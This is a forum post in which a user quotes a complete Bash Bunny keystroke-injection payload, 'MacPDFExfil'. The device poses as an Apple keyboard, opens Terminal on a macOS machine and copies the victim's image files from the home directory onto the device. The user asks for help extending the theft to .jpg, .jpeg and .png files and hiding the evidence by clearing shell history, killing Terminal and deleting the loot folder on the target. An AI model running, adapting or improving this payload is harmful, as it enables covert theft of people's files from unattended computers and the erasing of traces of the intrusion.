Jump to content

MacPDFExfil modifications


Recommended Posts

Hello,

I was playing around with the MacPDFExfil payload on my Bash Bunny and as expected it worked fine. I however tried to modify it a bit and ran into some trouble.

I wanted the BashBunny to look for .jpg, . jpeg and .png files all at the same time and put them into the loot folder. Changing it to only one of them is no problem but I couldn't figure out a way to look for all 3 file types at the same time. Moreover, I wanted the code to have an history -c and then the killall Terminal to leave as little trace of what I did as possible. Obviously that didn't work either. Replacing the killall Terminal with history -c works fine but having history -c and then killall Terminal didn't work. I played around with it and either I got an error or the last part (killall Terminal) just didn't show up at all. Last but not least I would also like to remove the /loot folder that is created on the target machine itself.

If someone could help me with that I'd appreciate it a lot.

Thanks 

Quote

#!/bin/bash
#
# Title:         MacPDFExfil
# Author:        k1ul3ss
# Props:         audibleblink
# Version:       1.0
# Category:      Exfiltration
# Target:        macOS
# Attackmodes:   HID, Storage

ATTACKMODE STORAGE HID VID_0X05AC PID_0X021E

# device name
dev_name="BashBunny"

# loot directory
lootdir="/Volumes/$dev_name/loot/Images/"

QUACK GUI SPACE
QUACK DELAY 1000
QUACK STRING terminal
QUACK ENTER
QUACK DELAY 2000
QUACK STRING mkdir -p $lootdir
QUACK ENTER
QUACK STRING find \~ -name \'*.png\' -exec cp \"{}\" $lootdir \\\;\; killall Terminal
QUACK ENTER

# sync the filesystem
sync

 

Link to post
Share on other sites
  • 1 year later...

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    No registered users viewing this page.

×
×
  • Create New...